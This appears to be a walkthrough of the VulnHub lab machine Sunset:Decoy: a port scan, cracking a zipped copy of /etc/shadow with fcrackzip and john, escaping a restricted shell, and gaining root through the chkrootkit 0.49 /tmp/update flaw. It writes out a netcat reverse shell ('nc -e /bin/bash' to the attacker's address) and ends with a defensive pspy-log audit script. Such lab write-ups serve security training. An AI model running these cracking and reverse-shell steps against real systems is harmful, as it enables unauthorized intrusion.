[VLN] Sunset:Decoy

Today we are going to hack the Vulnhub machine called Sunset:Decoy. You can download it from the following link: https://www.vulnhub.com/entry/sunset-decoy,505/
  • Enumeration
    We start with an nmap scan to see which ports are open.

    ~> nmap -A -p- 192.168.1.123
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 10:09 CEST
    Nmap scan report for 60832e9f188106ec5bcc4eb7709ce592.home (192.168.1.123)
    Host is up (0.00048s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
    |   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
    |_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
    80/tcp open  http    Apache httpd 2.4.38
    | http-ls: Volume /
    | SIZE  TIME              FILENAME
    | 3.0K  2020-07-07 16:36  save.zip
    |_
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Index of /
    Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds
    Only SSH and HTTP are exposed, and the web root is a directory listing that offers a single file. If we visit http://192.168.1.123 we see that we can download the file save.zip. We download it.

    ~/ctf/vulnhub/decoy > wget http://192.168.1.123/save.zip
    --2020-07-10 10:12:52--  http://192.168.1.123/save.zip
    Conectando con 192.168.1.123:80... conectado.
    Petición HTTP enviada, esperando respuesta... 200 OK
    Longitud: 3123 (3,0K) [application/zip]
    Grabando a: “save.zip”

    save.zip            100%[=========================>]   3,05K  --.-KB/s    en 0s

    2020-07-10 10:12:52 (712 MB/s) - “save.zip” guardado [3123/3123]
    When we try to unzip it, we see that it is password protected. We use fcrackzip with the rockyou wordlist to crack the password.

    ~/ctf/vulnhub/decoy > fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip
    found file 'etc/passwd', (size cp/uc    668/  1807, flags 9, chk 90ab)
    found file 'etc/shadow', (size cp/uc    434/  1111, flags 9, chk 834f)
    found file 'etc/group', (size cp/uc    460/   829, flags 9, chk 8d07)
    found file 'etc/sudoers', (size cp/uc    368/   669, flags 9, chk 1535)
    found file 'etc/hosts', (size cp/uc    140/   185, flags 9, chk 8759)
    found file 'etc/hostname', (size cp/uc     45/    33, flags 9, chk 8ce8)

    PASSWORD FOUND!!!!: pw == manuel
    We unzip the file with the password we cracked (manuel).

    ~/ctf/vulnhub/decoy > unzip save.zip
    group  hostname  hosts  passwd  shadow  sudoers
    From the shadow file we take the last user together with its hash and save it to the file tocrack.txt.

    ~/ctf/vulnhub/decoy > nano tocrack.txt
    # contents
    296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.
    We crack the password with john and the rockyou wordlist.

    ~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    server           (96640a3b825115a47b68fc44501c828)
    1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s felton..Hunter
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    The password is "server". We log in via ssh :)
  • Low Shell
    ~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123
    The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established.
    ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts.
    296640a3b825115a47b68fc44501c828@192.168.1.123's password:
    Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
    -rbash: dircolors: command not found
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
    When we log in we see that we get a restricted shell (rbash). To escape it we log in as follows, asking ssh to run bash directly instead of the login shell, and then spawn a proper tty:

    ~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 "bash --noprofile"
    296640a3b825115a47b68fc44501c828@192.168.1.123's password:
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    We export PATH so that we have a less restricted PATH.

    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export PATH=/bin:/usr/bin:$PATH
    We explore our user's home directory.

    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls
    fich  logs
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls
    log.txt
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt
    ---- SNIP ----
    pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
    2020/06/27 18:56:57 CMD: UID=1000 PID=7645  | php -S 0.0.0.0:8080
    2020/06/27 18:56:57 CMD: UID=0    PID=6     |
    2020/06/27 18:56:57 CMD: UID=0    PID=222   | /lib/systemd/systemd-journald
    2020/06/27 18:56:57 CMD: UID=0    PID=10    |
    2020/06/27 18:56:57 CMD: UID=0    PID=1     | /sbin/init
    2020/06/27 18:56:58 CMD: UID=0    PID=12385 | -bash
    2020/06/27 18:56:58 CMD: UID=0    PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
    2020/06/27 18:57:07 CMD: UID=0    PID=12402 | -bash
    2020/06/27 18:57:07 CMD: UID=0    PID=12403 | -bash
    Exiting program... (interrupt)
    ---- SNIP ----
    The log is a pspy capture, and it shows root (UID=0) unpacking chkrootkit-0.49, so the machine is probably running that version as root. Searching Google, we find that there is an exploit[1] for that version.
  • Privilege Escalation
  • Following the steps of the exploit, we create the file "/tmp/update" so that it executes a reverse shell.
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo "nc -e /bin/bash 192.168.1.111 7777" > update
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
    nc -e /bin/bash 192.168.1.111 7777
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x update
    We set nc listening.

    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    Finally, we run the honeypot.decoy program found in our home directory and select option 5 so that it launches chkrootkit.

    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
    --------------------------------------------------
    Welcome to the Honey Pot administration manager (HPAM). Please select an option.
    1 Date.
    2 Calendar.
    3 Shutdown.
    4 Reboot.
    5 Launch an AV Scan.
    6 Check /etc/passwd.
    7 Leave a note.
    8 Check all services status.
    Option selected:5
    5
    The AV Scan will be launched in a minute or less.
    --------------------------------------------------
    After a while... we get the root shell! :)

    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    root@60832e9f188106ec5bcc4eb7709ce592:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
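    A defender-side check for the weakness used above, added here as an example (not part of the original writeup): it parses pspy log lines like the ones in log.txt, flags commands run as root that reference a chkrootkit release older than 0.50, and reports whether a /tmp/update file exists in the state a scheduled chkrootkit 0.49 run would execute. The sample log is constructed from the lines shown on this page; the function and constant names are mine.

```python
import re
import stat
from pathlib import Path

# pspy event line, as in the log shown above (assumption: pspy keeps this format).
PSPY_RE = re.compile(r"^(\S+ \S+) CMD: UID=(\d+)\s+PID=(\d+)\s*\|\s*(.*)$")
# chkrootkit up to 0.49 runs /tmp/update as root (EDB 33899, cited on this page).
CHKROOTKIT_RE = re.compile(r"chkrootkit-(\d+)\.(\d+)")
FIXED_VERSION = (0, 50)

# Constructed sample: the relevant lines from log.txt above, plus one non-event line.
SAMPLE_LOG = """\
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
2020/06/27 18:56:57 CMD: UID=1000 PID=7645  | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=0    PID=222   | /lib/systemd/systemd-journald
2020/06/27 18:56:58 CMD: UID=0    PID=12385 | -bash
2020/06/27 18:56:58 CMD: UID=0    PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
Exiting program... (interrupt)
"""

def parse_pspy(text):
    """Return (timestamp, uid, pid, cmd) tuples; non-event lines are skipped."""
    events = []
    for line in text.splitlines():
        m = PSPY_RE.match(line.strip())
        if m:
            events.append((m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)))
    return events

def find_vulnerable_chkrootkit(events):
    """Root (UID 0) commands that reference a chkrootkit release older than 0.50."""
    hits = []
    for ts, uid, pid, cmd in events:
        m = CHKROOTKIT_RE.search(cmd)
        if uid == 0 and m and (int(m.group(1)), int(m.group(2))) < FIXED_VERSION:
            hits.append((ts, pid, m.group(0)))
    return hits

def audit_update_file(tmp_dir="/tmp"):
    """Describe <tmp_dir>/update if present: an executable copy not owned by root is
    exactly what a scheduled chkrootkit <= 0.49 run would execute with UID 0."""
    p = Path(tmp_dir) / "update"
    if not p.exists():
        return None
    st = p.stat()
    executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    return {"path": str(p), "owner_uid": st.st_uid, "executable": executable,
            "suspicious": executable and st.st_uid != 0}
```

    Run `find_vulnerable_chkrootkit(parse_pspy(SAMPLE_LOG))` to see the 0.49 extraction flagged, and `audit_update_file()` on the box to see whether a stray /tmp/update is waiting for the next scan.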
  • root.txt
  • root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt
    [ASCII art banner]
    1c203242ab4b4509233ca210d50d2cc5
    Thanks for playing! - Felipe Winsnes (@whitecr0wz)
  • End
  • And with this we are root on the machine :)

    [1] https://www.exploit-db.com/exploits/33899